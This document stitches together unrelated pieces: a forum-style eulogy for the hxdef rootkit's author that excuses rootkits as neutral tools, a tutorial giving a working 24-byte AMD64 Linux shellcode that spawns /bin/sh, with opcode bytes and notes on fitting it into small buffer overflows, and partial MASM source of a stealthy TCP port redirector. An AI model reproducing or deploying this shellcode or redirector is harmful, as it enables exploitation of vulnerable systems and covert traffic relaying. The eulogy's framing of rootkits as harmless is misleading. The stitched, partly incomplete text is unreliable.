hf = Holy Father, the guy who coded the "hxdef" Hacker Defender rootkit, died recently in a car crash! I wasn't convinced it was true at first, but I've since had it confirmed by "someone" who should know.
Whatever "some" people may think of him and his software, there's no doubt that he was talented. Not only that: his RKs, software and info all pushed operating system and antivirus companies to start taking their security more seriously. A lot has happened over the years, but more often than not it's been too little, too late! Most of the improvements, suggestions and quality apps have come from smaller, lesser-known companies and individuals.
Rootkits were around in small numbers before hxdef appeared on the scene, but it was the release of hxdef that made it a lot easier for more people to take advantage of this technology, which they have done in increasing numbers ever since. This led to others coding their own RKs, and it's taken some time, but now they are almost "mainstream"!
What needs to be remembered is that RKs in themselves are not bad at all. It's the payload that usually comes with one that can, and often does, do the damage. The RK's task is to hide both itself and the payload. Not all RKs are 100% successful at doing both, or either, but even when they're not, they can be very hard to detect and remove. That's why RKs are a clever invention, however much we despise the payloads for all they do!
So a chapter in PC history has ended tragically, and I have to say that hf wasn't evil; he just enjoyed the challenge. Whatever others did with his and similar tech wasn't his doing! A gun in itself doesn't do anything whatsoever: it has to be loaded by someone, then pointed and fired by them to do any damage. The RK is the gun, and the payload is the bullet.
The shellcode has been updated; its size has shrunk from 25 to 24 bytes.
2006-05-01
Added a note about the stack space required (Andreas Geiger). Improved formatting of the assembly/C listings.
Introduction
Extensive documentation can be found on the subject of shellcodes for the i386 (or IA32) architecture, but almost nothing seems to be currently available for the AMD64 architecture.
This article presents an AMD64 shellcode for Linux that is particularly short (24 bytes). We assume the reader already has basic knowledge of shellcodes and of the i386 architecture.
AMD64 Architecture ABI
The AMD64 architecture ABI specification can be obtained from http://www.amd64.org/documentation. A shellcode developer should be aware of the following main technical differences with respect to i386:
These registers are used for passing arguments to system calls: %rdi, %rsi, %rdx, %r10, %r8, %r9.
The instruction to make a system call is syscall.
The number of the syscall has to be passed in register %rax.
During system calls, the kernel destroys registers %rcx and %r11.
With this simple knowledge, a shellcode can be easily developed.
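As a rough illustration of the convention listed above, the following Python sketch maps a syscall number and its arguments onto the registers the kernel expects. The helper name syscall_registers and the dictionary layout are assumptions made for this example, not part of any real API; only the register order comes from the list above. The sketch performs no system call.

```python
# Argument registers for Linux AMD64 system calls, in order (from the list above).
SYSCALL_ARG_REGISTERS = ("rdi", "rsi", "rdx", "r10", "r8", "r9")


def syscall_registers(number, *args):
    """Return the register state expected just before the `syscall` instruction.

    Hypothetical helper for illustration only; it only builds a dictionary.
    """
    if len(args) > len(SYSCALL_ARG_REGISTERS):
        raise ValueError("a system call takes at most 6 register arguments")
    regs = {"rax": number}                         # syscall number goes in %rax
    regs.update(zip(SYSCALL_ARG_REGISTERS, args))  # arguments fill the list in order
    return regs


if __name__ == "__main__":
    # A three-argument call: the placeholders stand for real argument values.
    print(syscall_registers(0x3B, "path", "argv", "envp"))
```

Registers %rcx and %r11 are deliberately absent from the mapping: the kernel overwrites them, so they cannot carry arguments.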
Shellcode
Here is a disassembly of the shellcode, as produced by objdump -d (with the opcode bytes at the beginning of each line):
6a 3b                           push $0x3b
58                              pop %rax                        # set %rax to 0x3b
99                              cltd                            # %rdx (arg 3: envp) is set to 0
48 bb 2f 62 69 6e 2f 2f 73 68   mov $0x68732f2f6e69622f,%rbx    # set %rbx to "/bin//sh"
52                              push %rdx                       # push 0
53                              push %rbx                       # push "/bin//sh"
54                              push %rsp
5f                              pop %rdi                        # %rdi (arg 1: path) points to "/bin//sh"
52                              push %rdx                       # push 0
57                              push %rdi                       # push ptr to path
54                              push %rsp
5e                              pop %rsi                        # %rsi (arg 2: argv) points to ["/bin//sh",0]
0f 05                           syscall                         # execve(path,argv,envp)
push $0x3b and pop %rax set %rax to 0x3b, which is the syscall number for execve(). Syscall numbers can be found in /usr/src/linux/include/asm-x86_64/unistd.h.
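cltd, also known as cdq, sign-extends %eax into %edx:%eax. Since %eax is 0x3b, a positive value, this sets %edx to 0; and because a write to a 32-bit register on AMD64 clears the upper half of the corresponding 64-bit register, the whole of %rdx becomes 0. The 3rd argument of execve(), envp, will be %rdx.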
mov $0x68732f2f6e69622f,%rbx stores the string "/bin//sh" into %rbx.
push %rdx and push %rbx store our string, followed by NUL bytes, on the stack.
push %rsp and pop %rdi are equivalent to mov %rsp,%rdi but use fewer opcode bytes (2 instead of 3). %rdi now points to "/bin//sh". The 1st argument of execve(), path, will be %rdi.
push %rdx and push %rdi construct our argv array on the stack.
push %rsp and pop %rsi, equivalent to mov %rsp,%rsi, stores a pointer to the argv array into %rsi. The 2nd argument of execve(), argv, will be %rsi.
syscall enters kernel mode, where the system call is processed. Its 3 arguments are %rdi (path), %rsi (argv) and %rdx (envp), that is: execve("/bin//sh", ["/bin//sh", NULL], NULL). Linux indeed allows a NULL envp pointer.
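The walkthrough above can be checked without running any machine code. The following Python sketch replays the register and stack effects of each instruction on a toy memory model and then inspects what %rdi and %rsi point to. The function names (cdq, simulate, read_cstring) and the starting stack address are assumptions chosen for illustration; the model only covers the handful of instructions used here.

```python
MASK32 = 0xFFFFFFFF


def cdq(eax):
    """Model cltd/cdq: return the new %edx (the sign bit of %eax replicated)."""
    return MASK32 if eax & 0x80000000 else 0


def simulate(stack_top=0x7FFFFFFFE000):
    """Replay the listing on a toy model; return (registers, memory)."""
    mem = {}                      # address -> 64-bit value stored at that address
    regs = {"rsp": stack_top}     # arbitrary, hypothetical initial stack pointer

    def push(value):
        regs["rsp"] -= 8
        mem[regs["rsp"]] = value

    def pop():
        value = mem[regs["rsp"]]
        regs["rsp"] += 8
        return value

    push(0x3B); regs["rax"] = pop()          # push $0x3b ; pop %rax
    regs["rdx"] = cdq(regs["rax"] & MASK32)  # cltd (32-bit write zero-extends to %rdx)
    regs["rbx"] = 0x68732F2F6E69622F         # mov $0x68732f2f6e69622f,%rbx
    push(regs["rdx"])                        # push %rdx
    push(regs["rbx"])                        # push %rbx
    # push %rsp stores the value %rsp had before the push; Python evaluates
    # the argument before push() decrements it, which matches that behavior.
    push(regs["rsp"]); regs["rdi"] = pop()   # push %rsp ; pop %rdi
    push(regs["rdx"])                        # push %rdx
    push(regs["rdi"])                        # push %rdi
    push(regs["rsp"]); regs["rsi"] = pop()   # push %rsp ; pop %rsi
    return regs, mem


def read_cstring(mem, address):
    """Read a NUL-terminated string stored as little-endian 64-bit words."""
    data = b""
    while b"\0" not in data:
        data += mem[address].to_bytes(8, "little")
        address += 8
    return data.split(b"\0", 1)[0]


if __name__ == "__main__":
    regs, mem = simulate()
    print("path   :", read_cstring(mem, regs["rdi"]))
    print("argv[0]:", hex(mem[regs["rsi"]]), "(should equal %rdi)", hex(regs["rdi"]))
    print("argv[1]:", mem[regs["rsi"] + 8])
    print("envp   :", regs["rdx"])
```

The little-endian decoding in read_cstring is also why the immediate 0x68732f2f6e69622f reads as "/bin//sh" in memory: the lowest byte, 0x2f ("/"), is stored first.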
The AMD64 shellcode presented above has a length of only 24 bytes. This makes it particularly useful when exploiting overflows of small buffers. Please note however that it uses 40 bytes of stack space; depending on the stack layout it might be a problem because the push operations can corrupt the shellcode itself. In such cases it is usually possible to add an instruction at the beginning of the shellcode that modifies %rsp to make it point to a safe area (e.g. add $40, %rsp).
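Both figures quoted above, 24 bytes of code and 40 bytes of stack, can be rederived from the disassembly. The Python sketch below does the bookkeeping; the table simply restates the listing, and the names LISTING, code_size and max_stack_depth are assumptions made for this example.

```python
# (instruction, opcode bytes as hex, change in stack depth in bytes)
LISTING = [
    ("push $0x3b",                   "6a 3b",                         +8),
    ("pop %rax",                     "58",                            -8),
    ("cltd",                         "99",                             0),
    ("mov $0x68732f2f6e69622f,%rbx", "48 bb 2f 62 69 6e 2f 2f 73 68",  0),
    ("push %rdx",                    "52",                            +8),
    ("push %rbx",                    "53",                            +8),
    ("push %rsp",                    "54",                            +8),
    ("pop %rdi",                     "5f",                            -8),
    ("push %rdx",                    "52",                            +8),
    ("push %rdi",                    "57",                            +8),
    ("push %rsp",                    "54",                            +8),
    ("pop %rsi",                     "5e",                            -8),
    ("syscall",                      "0f 05",                          0),
]


def code_size(listing):
    """Total number of opcode bytes in the listing."""
    return sum(len(bytes.fromhex(opcodes)) for _, opcodes, _ in listing)


def max_stack_depth(listing):
    """Largest number of bytes below the initial %rsp written at any point."""
    depth = deepest = 0
    for _, _, delta in listing:
        depth += delta
        deepest = max(deepest, depth)
    return deepest


if __name__ == "__main__":
    print("code size  :", code_size(LISTING), "bytes")
    print("stack usage:", max_stack_depth(LISTING), "bytes")
```

The peak is reached at the second push %rsp, just before pop %rsi, so anything stored within 40 bytes below the initial %rsp is overwritten.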
Here is the shellcode represented as a C language string:
This article has given the reader a quick overview of the process of developing assembly code using the AMD64 Linux kernel calling conventions. As a practical example, a 24-byte shellcode has been presented and explained.
Thanks
I would like to thank the following people for their comments and suggestions, in alphabetical order:
;====================[ The Smallest TCP Port Redirector ]=======================
;
;
;programmed by Holy_Father <holy_father@phreaker.net>
;Copyright (c) 2000,forever ExEwORx
;birthday: 8.9.2002
;version: 1.0
;
;compiled with MASM 6.14 with ALIGN:4
;total size: 2512b
;writes no output, silently terminates on error
;it is multithreaded and stable on Windows NT 4.0, Windows 2000 and Windows XP
;
;usage: sredir.exe listen_on_port redir_to_ip redir_to_port
; redir_to_ip must be IP address in A.B.C.D format
; no DNS implemented
;
;example: sredir.exe 100 212.80.76.18 80
;
;no other comments, cuz code is comment :)
;
.386p
.model flat, stdcall
include kernel32.inc
include winsock2.inc
LocalAlloc PROTO :DWORD,:DWORD
LocalFree PROTO :DWORD
ExitThread PROTO :DWORD
ExitProcess PROTO :DWORD
GetCommandLineA PROTO
Sleep PROTO :DWORD
CloseHandle PROTO :DWORD
CreateThread PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
TerminateThread PROTO :DWORD,:DWORD
WaitForMultipleObjects PROTO :DWORD,:DWORD,:DWORD,:DWORD
bind PROTO :DWORD,:DWORD,:DWORD
listen PROTO :DWORD,:DWORD
recv PROTO :DWORD,:DWORD,:DWORD,:DWORD
send PROTO :DWORD,:DWORD,:DWORD,:DWORD
closesocket PROTO :DWORD
inet_addr PROTO :DWORD
WSAIoctl PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD,
:DWORD,:DWORD
WSAStartup PROTO :DWORD,:DWORD
WSACleanup PROTO
WSACreateEvent PROTO
WSASocketA PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
WSAConnect PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD,:DWORD
WSAEnumNetworkEvents PROTO :DWORD,:DWORD,:DWORD
WSAAccept PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD
WSAEventSelect PROTO :DWORD,:DWORD,:DWORD
WSAWaitForMultipleEvents PROTO :DWORD,:DWORD,:DWORD,:DWORD,:DWORD
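@IntToStr: ;despite the name, parses a decimal string into eax (-1 on error)
push esi ;save esi
xor eax,eax ;clear eax and edx
xor edx,edx
mov esi,[esp+008h] ;esi = string argument (the caller's edi); [esp+8] skips the saved esi and the return address
@IntToStr_next_char:
lodsb ;load the next byte into al
test eax,eax ;reached the terminating NUL?
jz @IntToStr_end ;yes, done
imul edx,edx,00Ah ;edx=edx*10
cmp al,030h ;below '0'?
jb @IntToStr_error ;yes, not a digit
cmp al,039h ;above '9'?
ja @IntToStr_error ;yes, not a digit
sub eax,030h ;convert the ASCII digit to its value
add edx,eax ;add it to the result
jmp @IntToStr_next_char ;process the next character
@IntToStr_error:
xor edx,edx ;edx = -1 signals an error
dec edx
@IntToStr_end:
mov eax,edx ;return the result in eax
pop esi
ret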
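For readers less used to x86 assembly, the routine above can be paraphrased in Python. This is only a sketch of the same logic under stated assumptions: the name parse_decimal is hypothetical, the input is a byte string, the end of the byte string is treated like the terminating NUL, and arithmetic wraps at 32 bits as it does in edx.

```python
MASK32 = 0xFFFFFFFF


def parse_decimal(text: bytes) -> int:
    """Parse an unsigned decimal string the way @IntToStr does.

    Returns the value modulo 2**32, or 0xFFFFFFFF (-1 as a 32-bit value)
    if a non-digit character is found before the terminating NUL.
    """
    value = 0
    for ch in text:
        if ch == 0:                      # test eax,eax / jz: NUL terminator
            break
        value = (value * 10) & MASK32    # imul edx,edx,0Ah
        if ch < 0x30 or ch > 0x39:       # cmp al,'0' / jb and cmp al,'9' / ja
            return MASK32                # xor edx,edx / dec edx
        value = (value + (ch - 0x30)) & MASK32   # sub eax,30h / add edx,eax
    return value


if __name__ == "__main__":
    for sample in (b"100\0", b"80\0", b"8o\0"):
        print(sample, "->", hex(parse_decimal(sample)))
```

Because -1 doubles as the error code, the caller cannot distinguish a parse error from the literal value 4294967295; for port numbers this is harmless.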
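@arg_len: ;@arg -> edi, char -> eax; returns the argument length in eax
push edi ;save the pointer to the argument string
xor ecx,ecx
dec ecx ;ecx = -1, so the scan below has no practical length limit
repnz scasb ;scan forward until the byte in al (the delimiter) is found
not ecx ;ecx started at -1 and dropped by one per byte scanned, so NOT gives the bytes scanned, delimiter included
dec ecx ;drop the delimiter itself to get the length
mov eax,ecx ;deriving the length from the counter is shorter than subtracting pointers
pop edi ;restore the pointer to the start of the argument
ret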
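The counter trick in @arg_len (start ecx at -1, scan, then NOT and decrement) is easier to follow when stepped through explicitly. The Python sketch below models repnz scasb on a byte string with 32-bit wraparound. The function name arg_len is borrowed from the label, but the Python signature is an assumption, and the model requires the delimiter to be present in the buffer.

```python
MASK32 = 0xFFFFFFFF


def arg_len(buf: bytes, delimiter: int, start: int = 0) -> int:
    """Model @arg_len: length of the argument at `start`, up to `delimiter`.

    Assumes `delimiter` occurs in `buf` at or after `start`.
    """
    ecx = MASK32                      # xor ecx,ecx / dec ecx  -> ecx = -1
    edi = start
    while ecx != 0:                   # repnz scasb
        byte = buf[edi]
        edi += 1
        ecx = (ecx - 1) & MASK32
        if byte == delimiter:         # ZF set: stop scanning
            break
    ecx = ~ecx & MASK32               # not ecx -> bytes scanned, delimiter included
    ecx = (ecx - 1) & MASK32          # dec ecx -> exclude the delimiter
    return ecx


if __name__ == "__main__":
    command_tail = b"100 212.80.76.18 80\0"
    print(arg_len(command_tail, 0x20))            # first argument, space-delimited
    print(arg_len(command_tail, 0x20, start=4))   # second argument
    print(arg_len(command_tail, 0x00, start=17))  # last argument, NUL-delimited
```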
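@Find_arg: ;str -> esi -> esi; skips spaces and leaves esi on the next argument
lodsb ;al = next byte, esi advances
cmp al,020h ;is it a space?
jz @Find_arg ;yes, keep skipping
dec esi ;step back onto the first non-space byte
ret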
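A Python paraphrase of @Find_arg, given here only as a sketch: the function name find_arg and its index-based interface are assumptions, with the index playing the role of esi. Like the assembly, it relies on a non-space byte (at worst the terminating NUL) following the spaces.

```python
def find_arg(buf: bytes, pos: int) -> int:
    """Model @Find_arg: return the index of the first non-space byte at or after pos."""
    while True:
        byte = buf[pos]       # lodsb: read the byte, then advance
        pos += 1
        if byte != 0x20:      # cmp al,20h / jz @Find_arg
            return pos - 1    # dec esi: step back onto the non-space byte


if __name__ == "__main__":
    command_line = b"sredir.exe   100 212.80.76.18 80\0"
    start = find_arg(command_line, len(b"sredir.exe"))
    print(start, command_line[start:start + 3])
```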